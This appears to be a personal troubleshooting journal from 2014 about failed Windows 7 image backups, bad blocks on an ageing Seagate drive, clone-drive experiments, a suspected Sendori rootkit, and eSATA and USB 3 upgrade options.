        I can find nowhere (hours of searching) any discussion of whether or not a USB clone drive can be changed, except of course by a differential clone update by the same clone software that created it. I suspect it can be changed a lot and would still work as a clone. Could it not for exmple have its user data files updated by Explorer? I don't see why not. I am going to run some tests.

        *  F:\windows\explorer.exe   ---- Running this brings up Explorer. (I added a shortcut to this f:\drive explorer on the desktop)
        *  Copied above explorer.exe and put it in f:\ root and it runs. Renamed it the f:\ root 'explorer-fulton.exe' and it runs.
        *  Copied 5 Gbyte video (1 hr Doc Martin) to f:\ drive. It runs in KmPlayer, explorer on f:\ still runs and a .png image I added post clone is OK.

        Conclusion so far programs on the clone run, and writting files to the clone does not seem to adversly affect it. A newly added video plays and other images and programs on f:\ do not seem to have been affected. Nothing vital seems to have been overwritten. This does not surprise me. It should have a normal Windows files structure and when written to by Explorer new files should go into blank sectors.

Could a 2nd drive be mounted inside?
        Probably, though I am not sure this is helpful. I can see where the sata cable from hard drive plugs into into the mother board. There's a 2nd sata cable (from the optical drive) plugged in next to it, and adjacent to these two there appears to be an open sata connector. It is adjacent to the other two, same size and same corner polarizing. However, getting in there to plug in a 3rd sata cable looks to be a bitch! There are open power supply cables bundled up. The complex metal cage with a couple of levers on the side where the hard drive is mounted (top) has extra space below, but I would need to find a video or HP article to figure out how to open this up. No longer are drives just screwed into a simple cage.

Trying to do Windows image backup of clean system (4/4/14)
        With a newly installed version of Windows 7 installed and (now) running well I decided to give Windows image another try. Also as I wrote above,  maybe now I know the trick to get a USB drive to be recognized. I got smarter and have made backup of my internal drive easier by not storing captured TV shows on it. These files are huge and had earlier filled up most of my 700 Gbyte drive. My c:\ drive now has about 50 Gbyres, so the image file size this time about 1/10th of the 640 Gbyres of the previous image and correspondingly should take only about 1/10th the time to write.

        I shut everything down, disconnect the clone USB (because the power connector is loose), restarted and began the clone, and didn't further touch the machine. I check it after 10 min and it was about 40% done and chugging along, so it looked like it was only going to take 20-30 minutes. So I go to bed only to find next morning a big red bar with message 'image failed' , 'device is not ready. That's it! No click here for details, no log, doesn't recommend deleting the partially written image file, doesn't even tell you its name or size so you can be find and delete it, no recommendation to check the hard drive for errors, nothing! This is Microsoft to a tee. They don't give a shit. This is not an obscure tech tool, this is the primary image backup intended to be used by everybody, and this is the help you get when things go wrong, totally user unfriendly. When I checked, I found this useless backup file wasting 45 Gbytes of space on my backup #2 USB drive. Deleted it. I'm going to try it again.

2nd try
       Well tried it again and failed again. I saved it to same 2Tbyte #2 My Book USB drive, this time during day so I could watch. This time before I started I further slimmed down c:\  removing 8 Gbytes worth of captured TV shows. Started at 3:03 pm (it makes a restore point at this time when it starts), OK at 3:20 pm still going, but when I looked at 3:36 pm the file size at 45 Gybtes was not changing, and a few seconds later I see the message screen go from green 70% green to 100% red with same error message: image failed, device not ready. Both times it writes 45 Gbytes to my new My Book 2 Tbyte drive and stops reporting the USB drive is 'not ready'. (Update --- I found out 45 Gbyte file size is a FAKE. When the image backup starts this size is immediately shown, it's the expected final size and does not change as the file is being written.)

        Yikes more backup problems! As usual it's complicated. Is there something wrong with my new 2Tbyte drive, or is this a problem with Window image backup? This would be the biggest file ever written to USB WD #2, but I have had no other indiations that there is any problem with it, and as part of my backup work this drive has been error checked (by different programs) several times and always passed.

        I am going to run chkdsk on the drives and do the Windows image backup one more time, this time saving it to USB WD 2Tbyte drive #1, where the old 600 Gybe image is of unstable Windows it. Ran two error checks on USB 2Tbyte #2 and no errors found!

3rd try --- AMD Raid error seemed to trigger write failure
        Image backup failed again, 3rd time. This time wrote to J;\ drive, WD 2 Tbyte #1. Failed at same time, same error, but this time I noticed something, a strong clue to where the problem is. Just about the time the backup failed (about 35 min in), in lower right corner a AMD RaidXpert Error flashed (and of course disappeared in a few seconds). I have been seeing this error message pop up occasionally since the new install, but nothing seemed wrong and I am not using Raid (as far as I know), so I ignored it. At this point I know nothing about Raid, so I have no clue as to how to fix it. Can't believe I am using Raid since I have only one hard drive. I have run extensive HP diagnostics on my whole system and it never reports an error. This says AMD RaidXpert, so it smells like a deep error, like some CPU function is switched on that shouldn't be.

PC magazine article on Windows 7 image backup (2010)
        Author says positive stuff, then I find this: 'It's a little picky about doing image restores' and he wouldn't use it. Oh, yes a ringing endorsement. Christ, a backup program that doesn't reliably restore is worse than useless!

        I can certainly believe that Windows image is so delicate that it shuts down when it sees a Raid 'warning', even though the warning is spurious.

Forum postings

        "The RAIDXpert is a remote RAID configuration tool, for changing the RAID level of the RAID setup connected via SATA 3.0 Gbit/s ports (connected to SB600, excluding extra SATA 3.0 Gbit/s ports through additional SATA chip on some motherboard implementations), including RAID 0, RAID 1, and RAID 0+1."  (This seems to have no use to me. My machine doesn't even have USB 3 ports) I'd just uninstall it says poster.

                1) Msconfig has a list of services. It is shown here running, but on this page the service can be unchecked and stopped.
                2) AMD RaidExpert is a program that can be uninstalled. There are other more low level looking AMD programs on the list that I wouldn't dare touch.

        I did the first and stopped the service. This is the less risky than uninstall as it can always be restarted.

        RaidXpert forum
         http://h30434.www3.hp.com/t5/Desktop-Hardware/AMD-RAIDXpert-Warning-Errors/td-p/342708

4rd image backup try --- fails again (4/414)
        I thought I had it. I thought shuttting down the AMD Raid service would clear this error, but it made no freaking difference! The write failure occurred exactly as the previous three times, about 35 min in with same error message that 'device is not ready'. I confirmed before I started that the RaidXpert service, while still intalled, is not running.

        I have another idea. I downloaded a few days ago 'Advanced USB port monitor' program. The drives I am writing to are on USB ports. Might it be affecting the USB ports. The program is not running, but I see it listed (somewhere). It may either have a service running or perhaps it has installed USB drivers that are causing problems. I'll work this.

5th image try --- Going to Casper 8 ---- Another fail!
        I am giving Casper at try at writing an image backup file. I selected it do a standard backup file. (The other option is its own version that it can incrementally update.)  Writing the image file to 2Tbyte drive #2.  It is writing the file now. Format is .vhd, so its probably a standard Windows image file. Window, which if it ever gone more than 35 min, would probably have taken a little less than an hour. It looks like Casper is a little slower, 33 Gbytes/hr, so probably an hour and a half or so to write 50 Gbytes.

        Shit, this is really serious. I thought I had a clean system now I find I can't write 47 Gbyte file to USB drives to do an image backup. Casper went for an hour and 19 min writing 44.4 Gbyte on 2 Tbyte #2 (My Book) and then shutting down on an I/O error. Unlike Windows it brings up a long list of suggestions and links to diagnose the problem. The general tone is that this is a serious disk problem.

        The link to the Windows [ Event Viewer, Custom views, Administrative Events] which shows a long string of Errors. The errors during this copy are reported as:

        10:27:55             Filter Manager failed to attach to volume '\Device\HarddiskVolume16'.
        10:27:55             Filter Manager failed to attach to volume '\Device\HarddiskVolume14'.
        10:27:50             Disk -- The device, \Device\Harddisk0\DR0, has a bad block.
          9:10:02             Disk -- The device, \Device\Harddisk0\DR0, has a bad block.
          8:32:44             Disk -- The device, \Device\Harddisk0\DR0, has a bad block.
          6:20:24             Disk -- The device, \Device\Harddisk0\DR0, has a bad block.

        Ok, a strong clue here. Each of the image copies failed with above Disk error (which preceed the screen image fail message by just a few seconds), and Disk 0 is normally the internal drive (700 Gbyte Seagate). This would explain why it doesn't matter which software is doing the backup, to which USB drive being written, and why the failure occurs at about the same point. There's a bad block on the internal Seagate that can't be read!

 So what do I do now?
        * (update -- Nope, neither Windows (grayed out) nor Casper (geometery not supported) allow the USB clone to be the source drive.
        Make an image backup from the f:\ clone! Took me a while to think of this, but if the f:\ clone is OK (?), it is clearly different hardware so I should be able to make an image clone from it. The only possible flaw in this ointment is that I have been playing with it writing and deleting file from it using Exploer. It is worth a try, however, I will need another hard drive to test out the image.

6th image try (post chkdsk) -- Anothr fail
       * (update --- ran chkdsk on internal Seagate 700 Gbyte overnight, with check mark for 'scan and try and recover bad block'. Windows image backup is running now, we will see if it throws an error in 15 min. It did, chkdsk did not help.
        One thought is do a full sector disk scan with attempt at recovering bad sectors using either chkdsk or maybe HP disk utility. This will need to run overnight as it takes hours. (No hint in error messages as to which file has the bad block.)
        Another thought is 1/3rd of the hard drive appears to be useless stuff, it did not get copied to the clone, see JdiskReport. It could be the bad block is here. Maybe this stuff can be moved or deleted.

        * Much more risky is first do an another disk clone to the 1 Tbyte drive (which I have been modifying) and which of course my fail and will have some errors. Then format and/or scan the Seagate internal to try and clean out the bad sector.

        ** Less risky but more difficult would be swap in the new clone (or existing clone as a new clone may fail!) drive permanently and use the 700 Gybe as an outside clone backup. This makes sense in that the old Seagate has a lot of hours and hard use on it and it is probably smart with the case now open to swap in a new drive.

        ** For a drive swap to work I need to buy $100 worth of stuff:
                            -- buy another internal sate drive (important if I am going to retire or can't trust the internal 700 Gbyte Seagate)
                                              An important issue is sata speed (sata I. 1.5 G, sata II, 3 G, sata III, 6 G).
                                              Bios shows sata 1.    The Seagate Barruda I have is sata III (6 G) backward compatible with sata II (3 G), but not sata I.
                                                    This is probably why it is not recognized, however, it can be slowed down to sata I by adding a jumper.
                            -- buy one (or two) metal enclosures for single internal 3.5" sata drive. These include a external power supply brick (12V) and a sata to USB translator, so essentially for $20 it is the same two components now running the 1 Tybe Seagate on the floor, but in a metal box. Includes a power switch but unfortunately no led activity light. Choices are USB 3 or 2, check tthe the max drive capacity is at least 2 Tbytes.

                            -- No need, 18" sata cable came with 1 Tbyte Seagate drive
                                        18" Sata cable so I can try a clone drive without mounting it inside (using external power)
                            -- Nope, dual docking stations aren't good long term. Internal drives have exposed PC boards, they need to be in an enclosure to keep the dust off.  Dual enclosures don't made sense either. All (two) of them spin down the drives after 5 min of inactivity, and this cannot be turned off! The problem is heat, even though some of them have fans. I read 7,200 RPM drive (like new 1 Tbyte Seagate) put out more heat than the 5,400 RMP types.work either.
                                       buy a dual sata dock (with cloning)

Researching how to image (or clone) with bad blocks
        Here is Microsoft guy responding to this question on a forum:

        "System image backup is resilient to bad sectors (we would not backup the bad sectors but try to backup the rest). File backup is not. Can you run chkdsk on the volume before attempting to backup? Ideally if bad sectors are determined and marked before backup begins, backup would not try to read them and hence it should succeed." (poster says he ran chkdsk and the backup still failed) Other Microsoft experts say the opposite, "According to Minasi, the image backup program in Windows 7 has no option to skip over bad sectors."

        "System image backup supports only backing up NTFS volumes. Note that this is not an imaging solution like (Norton) Ghost. It is still a backup solution (we create a shadow copy of the volume before backing up and backup only the used blocks from the source). Since the backup can be used to restore back your system (Bare Metal Recovery), it is termed as system image."

        Image backup failure details are in this log: %windir%\Logs\WindowsBackup\*.etl

Swapping in the clone (4/5/14)
        Clone did not boot  --- message on screen is 'no operating system'.

        Let me describe my little misadventures in physically trying to swap in the clone. I am working with the computer on its side on floor in a not well let area. I have limited foot room, am bending over, and with my bifocals I cannot see well what I am doing (too far away for close up lens, but too close for distance lens).

        First mistake: HP sata connector are not like my 18" cable that came with new internal drive, but I don't know this. My clone sata cable is simple straight in plug (with corner polarizing key like all sata connectors), but the HP sata connector I later find out have a little side latch that needs to be pressed in to release the connector. I get it out, but I have pulled and rocked the motherboard mounted connector awful hard.

        The drive sata connector is a top side mounted mothboard connector. Even though things are still working I'm really worried that I might have affected the reliability of the computer by loosening or damaging the electrical connections between the connector and motherboard.

        Second mistake: I now realized that I have pulled the wrong HP sata cable, the DVD cable, and plugged in the clone there, so there were now two internal drives. Somehow I just assumed the top cage with the fancy latches was the hard drive and the box below was the DVD drive. Of course, if I had given it two seconds thought it would have been clear this is wrong. The DVD opening is at the top of the computer, the Seagate hard drive has to be the box (marked Seagate!) in a cage at the bottom. So I pull the 2nd sata cable, again way too hard, because I don't really know what to press or how to press, and plug the 18" sata cable there.

        Clone is now connected to where the old drive was with both HP sata connectors loose. I power up and now I get the message at the beginning of boot, 'no operating system'. So I pull the clone cable out of the motherboard and put the internal hard drive cable back where it was. I take the 18" cable and plug it into the sata to USB converter, the other end alread connected to the drive. I pray a little, and press the power button. The computer boots normally, so the motherboard hard drive connector and hard drive cable are OK.

        I should be back to normal, but I am not. The two directories from the clone USB drive are missing. This is where I am now. The only hardware differnece is that I am using the 18" sata cable vs the 6" corner sata cable to connect the 1 Tbyte drive to the sata-USB converter. Is the 18" cable bad? It didn't take any abuse, it was the HP cable and motherboard sata connectors that took the abuse. I checked and the 18" cable is secure at both end. I changed back the clone to the original 6" right angle cable and still no f:\ drive. I am now worried that plugging in the drive as a 2nd drive has damaged it. It apparently as a 2nd drive could not be read as I had a popup window saying it needed to be formatted, which I of course cancelled.

        Now back to exact same configuration as this morning, still no f:\ drive, but when I go into disk configuration screen there it is, all three partitions and all healthy. What has happened is that the clone partitions have lost their letter assignments. I suspect if I reassign them letters I will be back to normal (yup), but it brings up the question does the clone need to be set up before it goes in? It went in with assigned letter of f:\ and system marked as active. I could select it as a dual boot and disk configuration was telling me that the OS was running from the clone. It was my understanding that the system when only a single drive is present would just assign letters c:\ and d:\. So with this info it is likely the 18" cable is OK, but I need to put it back to confirm it.

So what's the problem with the clone?
        From a YouTube video (hard drive won't boot) I picked up a couple of ideas: Least likely is that I did not have the DVD plugged in the clone, but I think we can rule this out, because the machine booted when I pulled the internal hard drive in with the DVD sata cable still out and no problem. Much more worrying is speed mismatch the the motherboard sata and the drive sata. There is sata I (1.5 Ghz), sata II (3 Ghz), and sata III (6 Ghz). He said you can plug in a sata II hard drive to a sata I motherboard and it will (or can) not be recognized! In other words the question is can a new drive be too fast for an older motherboard? Is sata backward compatible, for example will a drive start at sata I speed and then upshift? Is there some way to slow down a new, faster sata drive to be compatible with an older motherboard? He goes on to praise the usefullness of sata-USB adoptor. One advantage he says is fast sata drive that is not recognized when pugged into a sata connector will work using sata-UBS adoptor.

        I had forgotten that my original hope was that I could just disconnect the internal hard drive and boot from the USB clone. I haven't tried this. For this test I can disconnect the sata connector at the internal drive, or even pull the power conector from the internal drive.

        Damn --- Disconnected the power cable from internal drive and connected clone via USB. It will not boot. Played with bios order putting it first and still no boot. It system partiion is thera and marked 'active'. Don't understand. With the internal hard drive inplace disk configuration tells me the OS has come from the USB clone.

        For starters I have no idea what the sata speed is on my computer (p6510f). I have the box for the Seagate Barracuda drive (bought 2012), and it is a 6Gbyes/sec (sata III?) but says it is backward compatible with 3 Gbyte/sec (sata II). Unfortunately sata in the bios is shown as sata 1. However, the Barracuda manual shows with a jumper plug (short outer two pins) it can be slowed to sata 1 (1.5 Gbytes/sec).  The drive can also be connected using sata cards PCExxxx, but that's another ball game.

Idea about why clone not recognized
        There are two issues here:
                1) Why didn't the computer boot from the clone via USB when power to internal drive removed (sata in). (no idea)
                2) Why was drive not found when when plugged in via sata (alone)

        I now have a theory for #2. There is a sata speed mismatch problem.
            -- 1 Tbyte Seagate Barracuda drive I have is 6 Gb/sec (sata III) and backward compatible to 3 Gb/sec (sata II). It can, however, be slowed to 1.5 Gbyte (sata I) by putting on a jumper to a jumper block (now open).

            -- HP p6510f spec on HP site shows its motherboard sata speed is 3 Gb/sec, which is sata II. However, I discovered a bios setting for sata I with options Enabled/Disabled. I found it enabled. This seems to indicate that motherboard sata rate can be doubled to 3 Gb/sec. Why it is slowed is TBD. I don't have the internal Seagate specs or the DVD specs. Either of these might be sata 1, or it might just be slowed from more reliability.

          -- Seagate ST3750528AS.  HP spec: 7,200 rmp, 750 Gbyte, sata. Amazingly this drive is still sold (Amazon): $105 for 750 Gbyte, but $68 for 1.5 Tbyte. It is in fact a sata 2 drive (3 Gb/sec) with 32 Mbyte cash. My (1 Tbyte clone drive is just a later model of the Seagate Baraccuda with double transfer speed (sata III, 6 Gb/sec, 64 Mbyte cache?))

p6510f hardware
        Five sata connectors (hard drive, DVD, 3 empty)
                    Spec says internal sata connectors: sata 1, sata 2  (Does this mean some are sata 1, some sata 2?)
        Four memory slots (2 occupied, 2 empty)
        Four empty expansion slots (one long, 3 very short)
                    One PCI Express x16 (Gen 2.0)
                    Three PCI-Express x1 (Gen 2.0)
                    One PCI Express x1 minicard socket (Gen 2.0)
       Motherboard has a Firewire (1394a) connector

Macrium 7th image test
        I now have run both chkdsk full scan and HP full scan on the internal Seagate drive. (didn't see chkdsk result, but passed all HP tests). I am trying different image software, some may be less sensitive to bad blocks. 7th test image is being written with Macrium. (The disk included with the Seagate drive has their cline software. Should look at that.) There is also the issue of image format, it's possible this may make a difference. Macrium wanted default to .xml, but I unclicked it. Has a type I don't recognize. It's been going 25 min now and is half done (for all three partitions). System partition quick and done, and how halfway through c:\ partition, d:\partition is done last.

Excluded
        "Data that is recognized as deleted files and unused partition areas are not recorded into the image. Windows pagefiles and hibernation file data are also excluded from a Backup Disk Image because they contain temporary information which is useless to keep and restore." (Macrium) Casper makes the same omision when it clones. This cuts about 15 Gbytes from the image

Macrium Success (it doesn't shut down on bad block errors)
        Macrium image report: Completed successfully in 53 min! I now find the image written on My Book #2 as 58 Gbyte files with a strange type ('.mrimg'), clearly this is a propriatry format, .mrimg probably stands for 'mr' (Macrium) 'img' (image).

        Looks to me like the Macrium is just ignoring the bad block disk errors that are shutting down Windows and Casper. I see a bunch of bland block disk errors during each of the Macrium images of the internal drive. Interestingly during imaging of the clone (also to My Book #2) there are NO disk errors (there are a few other errors, but no Disk errors). So it's pretty clear the 750 Gbyte drive has error that are not mapped out and that chkdsk can't fix. This could be why Windows got unstable. It's a strong argument for swapping in the clone permanently as prime internal drive.

                k:\Macrium image OK 4-5-14\7th image test-00-00.mrimg

        Having Macrium do it again. Suceeded again. This time accepted default of .XML format. I don't understand what they are doing. They ask me for a destination folder (same folder on #2 My Book, then they recommend that the .xml files be stored on c:\ drive (what?) (c:\user\don.'my documents\reflect\my backup.xml). Looks like it is going to put another .mrimg file on #2 My book. Screen says the .xml can be doubled clicked to run it. .xml are human readable script files.

        Unlike Casper or Windows Macrium will image the clone (old 3-31-14), so I am doing that now.

Here's the .xml header
         <!-- -->
         <!-- BDF v2.0.0 Image and backup definition file for Macrium Reflect v5.0 -->
         <!-- -->
          <!-- This file is a template XML to enable a Reflect backup or Image to be initiated from VB Script or an -->
          <!-- MSDOS batch file. -->
         <!-- Simply modify this file if required and pass the file name as a parameter to reflect.exe. -->

Next steps
        Ok Macrium has sucessfully done three images all to My Book #2: 2 of internal Seagate (each 58 Gbyte) and 1 of clone (48 Gbyte) in propriatary Macrium format.

        -- Change bios sata setting: Disable Sata 1 (who knows if this affects all or only some sata connectors)
                            Nope, no boot with internal drive when sata1 Disabled.
        -- To see if I can get clone recognized via sata it is probably conservative to just plug it into an open connector. This is how Seagate recommends you go about cloning a drive. Plug it in as 2nd drive and run Seagate disk with clone software. (It's a bitch to get plugged in to the open connectors. Need to map how they are keyed.

Clone and image progress (4/6/14)
        I was getting really worried all my hard work in last month renstalling Windows and all my programs on my old internal hard disk was falling apart. I have been really stymied in the last few days trying to make backup images. Seven attempts in a row failed using Windows and Casper image backup to various backup drives. They go 30-60 min and exit with error message 'device not ready'. I can see with Windows event viewer several disk errors (bad block on disk0) being reported, and this causes them to quit. Online I find experts complaining that most image backup programs fail too easily when hitting bad sectors, they almost none offer the option to skip over bad sectors. What is especially galling is there was no hint from any of these programs or event viewer where the bad blocks are, not even what disk they are on (though common sense would say it's probably the source disk). Full disk and repair scans with both Chkdsk and HP utility did not fix the bad blocks. Also neither program would allow imaging of my first clone backup.

Progress -- Macrium image rides over bad blocks
        Macrium image appears to be more robust to bad blocks, it did not stop, and reported success. It twice made an image of the internal 700 Gybe drive without complaining, and it also allowed the first clone (via USB) to be imaged and that went fine. With event viewer I could see a few disk errors had been reported when imaging the internal 700 Gbyte drive, but no disk errors reading off the new 1 Tbyte Seagate where the clone is.

More progress -- Casper clone identifies files with bad blocks
       More progress is shown below. Finally information on what file contains the bad blocks! With a Macrium image made of both the internal and clone drives last night I had Casper reclone the internal drive (from scratch, not an differential backup). It went to completion riding over bad blocks and in its report it identifies as 'Exceptions' the file(s) it could not copy. Yea!

        The file (above) that Casper clone had trouble with is not an important file and can be deleted. It is just a speedup cache of thumbnail images used to speedup an Explorer directory in image mode with lots of picture images. Anyway I copied the file first with Explorer, then deleted the original. This should recover what is possible and have made the bad blocks unused.

More, more progress --- SeaTools for Dos 'repairs' bad blocks
        Hopefully two nice tools from Seagate (only for Seagate drives) have cleaned up my old Seagate hard drive. 'SeaTools for Window' long test verified that I do indeed have bad blocks on my 700 Gybe internal drive. However, it can't repair bad blocks from Windows and recommended I run SeaGate for DOS that can. This required downloading an ISO file which is bootable and burning it to DVD. (They said Windows 7 could do this, but I tried and it just copied the ISO file to disk without expanding it! PowerISO did the job nicely.) The DVD boots and loads the dos program into ram, the hard drive is not being used can be worked on. Long test took five hours and it found 50 to 100 bad blocks. I selected 'repair all' and SeaTools for DOS then reported post repair the long test had been PASSED. So hopefully the bad blocks have been found and marked off. Windows boots up OK, post repair.

        Next step run a Windows image and another Casper clone. This should tell me if the old Seagate drive has been cleaned up.

        I put this nice Seagate recovery DVD in my recovery packet. I may need to run it again if the drive develops more bad sectors. It's also an indication I need to figure out how to get the new Seagate swapped in as my regular internal drive.

Windows image succceds (4/7/14)
        With bad blocks removed by SeaGate Dos tool a Windows image to J:\ drive succeeded (1 hr). A check of event viewer during the image write show no disk errors, unlike before where there was always half dozen or so.

        Unfortunately the image will need to be deleted because my system is not clean. I may have picked up a rootkit (maybe from PowerISO download) called: Sendori. Maybe I should try a system restore, I don't think it can bring back the bad blocks and I don't know how this will affect it. I've checked a lot of my programs and most everything works, EXCEPT, Opera is throwing up repeated security windows. I first though this was from the bad blocks removed, but all the windows say illegal site certificates (for Comcast, google, etc) are all signed by Sendori! A check online shows it is likely a rootkit.

Sendori (or Alureon) rootkit symptoms
       One poster said to check disk configuration and if you can't see your disks you are not infected. Well I have used this Windows asset repeatedly and the morning it doesn't work, when I hit 'Computer management' it doesn't come up.

1) Open a COMMAND PROMPT with Windows-R: Write cmd and press enter.
Open DISKPART: In a new line window write a command diskpart.
In a new prompt enter lis dis. Your computer is infected with rootkit Alureon if it remains empty. If the disks display, it is not. (They display)

2) From the Computer Management pane, launch DISK MANAGEMENT.
Everything is fine if it shows disks. If it does not show disks, it means the system is infected with this rootkit. (didn't show, now it does)        http://answers.microsoft.com/en-us/protect/forum/protect_other-protect_scanning/how-to-remove-sendori-malware/a35e5c4b-63c5-4a59-abab-669a76717ed9

        Footnote: I soon found I still had an  Opera problem, most sites were OK, but Google would not come up! I quickly fixed it. An hour earlier while trying to trace down the site security warning, I had made a change to Opera security setting. Apparently Google didn't like this and when I changed it back Google was happy and Opera was OK. I have zero understanding of browser security, this is deep in weeds. In Opera preferences, advanced, security, security protocols the default is check mark on the first two (of four): Enable SSL 3 and Enable TLS 1 (TLS 1.1 and TLS 1.2 are not checked). When I removed the check mark on TLS 1, Google would not load, when I put it back everything was OK.

Finally a stable system? --- Yikes, more bad blocks!
        Thinking I finally had a stable sytem, bad disk blocks marked, and recently downloaded pests clear out. But when I went to make a Window image Mon morning, I had an un happy surprise, it failed. Same as before 'device not ready' and the event viewer showed the same back block disk error. Clearly my old Seagate 700 Gbyte drive is not in good shape and is failing. Less than a day have a five hour low level Seagate DOS scan and passing, it has new bad blocks. It may be the reason Windows went bad a month ago.

        So I had Casper do an update to my clone drive (via USB) knowing that would both give me a backup and would identify the file with the bad block(s). It found bad blocks only in this one file: C:\Users\Don\AppData\Local\Opera\Opera x64\vps\0009\wb.vx"  (who knows what this does). I am having Macrium, which will skip over bad blocks do another image backup. Well not this time, it went about an hour and aborted reporting bad blocks (in c:\ partition).

How to manage two hard drives
        To me the obvious best thing to do for a robust system is have a clone drive (or two) that can be easily switched in. By easily I don't mean opening the case and physically swapping drive cables on the motherboard!  What I want is two drives inside, where I can electrically pick which one is active or primary. Note a Raid configuration, but two separate drive where I can decide when to do a clone of the primary. Where I could ideally electrically, maybe with a dual boot, swap in the clone for the primary. I have been reading about computers with two drives and don't find this, which I find totally amazing. One poster to a forum asked for something like I want and one reply suggested hard drive external in a 'tray' or external drives connected via esata. What is esata?

Esata solution?
        I had noticed esata connectors on some of the enclosures for internal drives on Amazon, but did not know what it was for. Clearly from the name it must be related to 'sata' which is the universal serial data cable used to connect hard drives and DVD players to the motherboard. Wikipedia (esata) has this:

        SATA is a computer bus interface for connecting host bus adapters to mass storage devices such as hard disk drives and optical drives. eSATA is a SATA connector accessible from outside the computer, to provide a signal (but not power) connection for external storage devices.

        eSATAp combines the functionality of an eSATA and a USB port, and a source of power in a single connector. eSATAp can supply power at 5 V and 12 V.

        On a desktop computer the port is simply a connector, usually mounted on a bracket at the back accessible from outside the machine, connected to motherboard sources of SATA, USB, and power at 5 V and 12 V. No change is required to drivers, registry or BIOS settings and the USB support is independent of the SATA connection.

        eSATAp throughput is necessarily the same as SATA, and USB throughput is that of the USB version supported by the port (typically USB 3.0 or 2.0). eSATAp ports (bracket versions) can run at a theoretical maximum of 6 Gbit/s (bits per sec) and are backwards compatible with devices such as eSATA 3 Gbit/s (SATA Revision 2) and also at 1.5 Gbit/s (SATA Revision 1).

        So on a quick look I find this. A quasi-standard has developed, supported in some of the inexpensive hard drive enclosures on Amazon, to port the sata to outside the computer. HP is reportedly including esata in some new machines. Since my machine has no esata port, it would require adding a card. Of course, I could add probably add a card to get USB 3 too, and it has almost the same speed as sata 3. Maybe combo cards are available. An Amazon search shows cards for 30-40 are available, but available too for 6-7 are simple brackets. These are nothing more than a back panel bracket with one (or two) sata connectors that internally connect to cables that just plug into sata connector on motherboard (I have three open). In other words it just in a neat way brings the sata port to the outside of the computer, where a cable can then be connected to an esata connector on an external hard drive enclosure. While it would allow drives to be connected and disconnected by hand from outside, it would be somewhat inconvenient in that it due to short cable lenghts it would be a connection at the back of the PC.

        Most Amazon reviewers report the esata brackets work. They can hook up external drives, they show up in bios and work OK. One reviewer suggested it was better to use a sata 2 hard drive externally (twice the clock period compared to sata 3), and this makes sense to me. This bracket is just a neater version of the expansion sata cables I was going to hang out of the drive. The problem I see is length. The max sata cable length (sans connector) is 1 meter and to run the cable from the hard drive in the front all the way out the back and to the front of the motherboard where the sata connectors are all located could easily (with slack) exceed 1 m. (Maybe I could find a power bracket and route my internal har drive through an open bracket and back in. The externally I could kill the power to the internal hard drive.)

        Here's from Wikipedia are the (theoretical speeds):

 SATA Rev1:         1.5 Gbit/s,
 SATA Rev2:         3 Gbit/s,
 SATA Rev3:         6 Gbit/s,
 USB 2.0:             480 Mbit/s,
 USB 3.0:                5 Gbit/s

        Another attractive option is a cheap (20) PCI Express card (700 reviews) that adds four USB 3.0 ports to the computer. USB 3 (theoretically) has almost the same speed as a sata 3 (6 Gb/sec), about x10 faster than USB 2, but file transfer timing tests show that in practice it is often more like x2 the speed of USB 2.

Seatools for DOS repair (2nd time) (4/8/14)
        For 2nd night in a row I did a repair scan of the internal drive. About the same result as before, about 200 bad sectors, mostly together and close to where the bulk of the failure were earlier. This time it fails a short test, but 'Passed long test with repairs'. Clearly I have a bad region on the disk and then a few scattered bad sectors. I have no idea if my current 50 Gbytes of data, only about 7% of the space on 700 Gbye drive, is anywhere near the bad area. Clearly what would be nice is a utility to move the working area of a drive. I should look at Seagate and WD to see if anything like this exists.

        Boots up OK and on a quick look system is clean and OK. My goal now is not to rescue this drive, but simply to get (at least) two backups, an image and clone, to both use for a new internal drive and to rescue my month of work rebuilding my system (March 2014) and for future. Now to get some clean images with everything OK:

Clean image/clones (4/8/14)
        1) Windows image to K:\ #2,  File format: .vhd, successful (40 min) --- System OK, clean, 4/8/14
                 Note, top level directory, WindowsImageBackup, has older date 4/5/14, but subdirectory (Windows7_HP) is dated 4/8/14. Besides the three image files for the three partitions, there are a whole bunch of .xml file (in same directory) whose purpose I don't understand yet. 59 Gbyes total. A day earlier Windows image produced only two .vhd files and no. xml files. I don't understand why the differences, as there are no option selections in a Windows backup, the three partitions of the internal drive being already pre-checked.

        2) Macrium image to K:\ #2,  File format: .mring (propriatary)    successful (46 min, uncompressed selected) --- System OK, clean, 4/8/14
            Produces a single 53 Gbyte file in propriatary format. Macrium also has the ability to image the clone (via USB), which other image programs grey out. Macrium makes .xml files too (option), but it puts them in a different place: c:\users\don\documents\reflect. [Header in the Macrium .xml file:

<!-- -->
<!-- BDF v2.0.0 Image and backup definition file for Macrium Reflect v5.0 -->
<!-- -->
<!-- This file is a template XML to enable a Reflect backup or Image to be initiated from VB Script or an -->
<!-- MSDOS batch file. -->
<!-- Simply modify this file if required and pass the file name as a parameter to reflect.exe. -->

Computer hard drive architectures
        There are two high speed serial buses in use to connect hard drives to computer motherboards:  USB and sata. USB is well standardized, hot plugable, currently with two speeds, and is used only externally. Sata is well standardized, currently with two speeds, hot pluggable (sort of) and used internally. In the last few years in a semi-standardized way the sata bus has become accessible outside the computer case.

        The external sata connector is called esata and is data only. (There is also a variant called something like esatap that add power pins for feeding +5V and +12V from the computer to the drive.) In its simplest form the esata connector, physically on an expansion bracket, is just plugged into a sata connector on the motherboard with no buffering.  This kind of gives me the willies, but is cheap, and from data signal integrity viewpoint it looks risky given the very high clock rates. However esata cables are sold at 3 ft and 6 ft lengths (plus another foot or so inside), and I read they work. Better (probably) are plug in cards that provide sata signals thorough an esata connector on the mounting bracket. Physically a sata cable is two data pairs with a ground between and ground on each edge for a total of seven pins. In other words the data paths are each a (flat) transmission line composed of two side by side wires with a ground wire on either side. The signal quality issue depends on the impedance mismatch introduced by the esata connector, and note with a simple bracket type esata connector there are two esata connectors in the path from the motherboard to an internal type sata drive when mounted in an outside enclosure.

        Nevertheless I am buying the hardware to try running a drive outside via esata. I paid $10 extra to get a 3.5" drive enclosure that has both an esata port and a USB 3 port. I am also buying a card to add four USB 3 ports to my computer. One of my 2 Tbyte data drives has a USB 3 output. USB 3 for a drive would probably be more reliable, but it is not at all clear that this configuration is bootable. I had my bootable clone drive connected via a sata-USB 2 converter for ten days and was not able to get it to boot off the USB drive. Well, there's a caveat, msconfig would tell me it booted from the clone, but it mattered little since the clone desktop did not appear nor would the clone files show up as c:\.

